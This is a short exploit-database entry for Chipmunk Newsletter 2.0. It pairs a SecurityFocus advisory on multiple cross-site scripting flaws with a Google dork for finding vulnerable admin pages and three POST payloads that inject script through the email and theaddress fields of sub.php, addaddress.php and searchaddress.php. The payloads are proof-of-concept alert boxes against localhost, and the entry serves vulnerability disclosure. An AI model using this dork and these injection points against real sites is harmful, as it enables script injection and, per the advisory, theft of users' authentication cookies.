Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities



EKU-ID: 38739 CVE: OSVDB-ID:
Author: b0telh0 Published: 2010-01-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/40024/info

Chipmunk Newsletter is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Chipmunk Newsletter 2.0 is vulnerable; other versions may also be affected.

::[ inurl:admin/login.php "Registering Admin" ]::



1 - http://localhost/sub.php

POSTDATA:
email=<script>alert(&#039;xss&#039;)</script>&choice=sub&lists=1&submit=submit



2 - http://localhost/admin/addaddress.php

POSTDATA:
email=<script>alert(&#039;xss&#039;)</script>&lists=1&submit=submit


then we can check it...



http://localhost/admin/searchaddress.php

POSTDATA:
theaddress=<script>alert(&#039;xss&#039;)</script>&submit=submit